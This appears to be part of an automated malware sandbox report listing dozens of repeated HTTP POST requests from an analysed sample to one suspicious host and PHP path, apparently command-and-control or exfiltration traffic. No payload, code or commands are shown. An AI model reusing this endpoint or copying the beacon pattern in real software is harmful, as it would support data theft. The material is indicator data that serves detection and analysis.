                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----MaiWBDBPLNTRdmLSbdcx8tEUy7faLjamVjUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3182Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1992Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----MZDXLsvNDmH2j6dJNWIEXsKkXw6XMr0MSCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3014Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2580Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1980Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----p3V6slVJ7hXe8d39XCGX37f04oKmGxfeiFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3182Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1980Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----08Dfp8jjadpVplryN3AuPdkfPQTJuY9T9PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3006Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
